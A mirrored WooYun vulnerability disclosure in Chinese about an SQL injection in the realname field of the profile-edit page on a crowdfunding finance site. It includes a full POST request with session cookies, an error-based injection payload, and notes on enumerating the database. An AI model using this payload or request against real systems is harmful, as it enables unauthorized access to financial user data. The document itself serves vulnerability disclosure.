乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-06: 厂商已经主动忽略漏洞,细节向公众公开
微众筹(weizhongchou.com)是为个人、企业和机构提供投融资服务的互联网金融平台。 既然是和金融挂钩的,要不要重视一点安全。顺便求个邀请码,谢谢
既然已经把登录界面等几个注入修复了,为什么不把这个也修复掉呢?漏洞存在于登录后的个人信息修改页面中的realname参数,realname后面几个参数可能也存在问题,没有做测试。
POST /?user&q=code/rating/basic HTTP/1.1Host: www.weizhongchou.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.weizhongchou.com/?user&q=code/rating/basicCookie: Hm_lvt_d5a437229cbd217c2211f2ed42ee3337=1441935543,1442884232,1442885020; pgv_pvi=7071446016; PHPSESSID=v6nmu2u52ockgbtbqe77897k65; Hm_lpvt_d5a437229cbd217c2211f2ed42ee3337=1442886359; pgv_si=s8797265920; hasshown=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 229realname=&card_id=&phone_num=13111111111&sex=1&birthday=2015-09-15&edu=1&school_year=2015-09-07&school=ssssssssss&marry=1&children=1&house=1&is_car=1&province=40&city=41&address=ssssssssss&phone=&submit=submit&submit=%CC%E1%BD%BB
注入参数:
Payload: realname=' AND EXTRACTVALUE(1106,CONCAT(0x5c,0x71767a6271,(SELECT (ELT(1106=1106,1))),0x716a6b6271)) AND 'GyWQ'='GyWQ&card_id=&phone_num=13111111111&sex=1&birthday=2015-09-15&edu=1&school_year=2015-09-07&school=ssssssssss&marry=1&children=1&house=1&is_car=1&province=40&city=41&address=ssssssssss&phone=&submit=submit&submit=%CC%E1%BD%BB---
看一下当前所使用的数据库--current-db
看一下是不是dba,并不是,还不错
没有继续向下做,但是涉及到金融,可能一点点小问题也能引发血案啊~~
登录框和其他几个地方的注入都修复好了,这个也一样,估计也只是忘记这个点了 *^_^*
未能联系到厂商或者厂商积极拒绝